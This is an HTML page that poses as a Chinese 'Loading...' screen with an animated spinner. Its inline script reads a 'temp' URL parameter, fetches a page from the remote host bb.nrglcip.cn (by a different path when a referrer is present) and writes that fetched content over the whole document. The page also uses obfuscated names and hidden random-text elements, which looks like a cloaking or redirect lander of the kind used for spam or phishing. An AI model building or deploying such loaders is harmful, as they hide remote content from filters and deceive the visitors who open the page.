<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cHDwCn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cHDwCn .iUL05C {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cHDwCn .content {
            line-height: 50px;
            text-align: center
        }

        .cHDwCn .img {
            width: 100%
        }

        .cHDwCn .DAM6Ye {
            text-align: center
        }

        .cHDwCn .DAM6Ye span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cHDwCn .DAM6Ye span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cHDwCn .DAM6Ye span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cHDwCn .DAM6Ye span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cHDwCn .DAM6Ye span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cHDwCn .DAM6Ye span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cHDwCn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MdaY7RemFgw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qrux5 = MdaY7RemFgw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qrux5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qrux5 +".html?a=share";
		}
		
        Hk4NJn8aR=url+"#"+new Date().getTime();
        Hk4NJn8aR && function() {
            $.get(Hk4NJn8aR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>vIIxWQzofSFapKnMhgigE1FnI9pNb11ib7WlVBUKqXeK9z7yHqYQBxpIP0gAP9S92KBpCGDFeLkwwsRlzT7NYB</p>
<ul style='display:none' >tpOoUTpbYIIKnxGbNOkqCaNBuNLv1KydtrVA4cIYDVlX1KgQRQ3gzJyoy7PS</ul>
<ul style='display:none' >tpOoUTpbYIIKnxGbNOkqCaNBuNLv1KydtrVA4cIYDVlX1KgQRQ3gzJyoy7PS</ul>
<div style='display:none'>w6cJqpWiNVjWJzX1kuk3NuwFvm0XKVjXvWpYK94jK</div>
<p  style='display:none'>vIIxWQzofSFapKnMhgigE1FnI9pNb11ib7WlVBUKqXeK9z7yHqYQBxpIP0gAP9S92KBpCGDFeLkwwsRlzT7NYB</p>
<h1 style='display:none' >vMj0kC5uGHwSCd6Phd2fr8t0mJTBbMSP55AQT3VHXJKYBY5XJXksV7sxV8Nv9uPhWztuaCvTsJqtHOyzWUlcAeV</h1>
<li style='display:none' >jj8BnmlwaDSnyadJ3JnUSLFPEF2OBMmiB66BnLwarTSFQ</li>
<a  href='#' style='display:none'>vq7mYRchg3kcERtj8d7PAN79YEzqmcRRArMlMANBvrgkYzjknKYNS6XdfBGo1yjh8kq</a>
<p  style='display:none'>vIIxWQzofSFapKnMhgigE1FnI9pNb11ib7WlVBUKqXeK9z7yHqYQBxpIP0gAP9S92KBpCGDFeLkwwsRlzT7NYB</p><div class="cHDwCn">
    <div class="iUL05C">
        <div class="DAM6Ye">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >kTGfPUfLNRMrg9RGGDDcs38Fa5HQNHGY2XDWb7RxQOrYMpsN4rRIhYvzeD2CsEL6ADtw0oVwJYmf1Tr7pahzmc7</li>
<li style='display:none' >kTGfPUfLNRMrg9RGGDDcs38Fa5HQNHGY2XDWb7RxQOrYMpsN4rRIhYvzeD2CsEL6ADtw0oVwJYmf1Tr7pahzmc7</li>
<li style='display:none' >kTGfPUfLNRMrg9RGGDDcs38Fa5HQNHGY2XDWb7RxQOrYMpsN4rRIhYvzeD2CsEL6ADtw0oVwJYmf1Tr7pahzmc7</li>
<p  style='display:none'>GeiHw7H4AUNIFl4N2yi6uRjS2Re1ZcCi46kmEDFBeOfqSz2G4H41xy3o4NmN5w248BDSLKPiK04JQp2fYQH6ZHmWYSd7</p></body>
</html>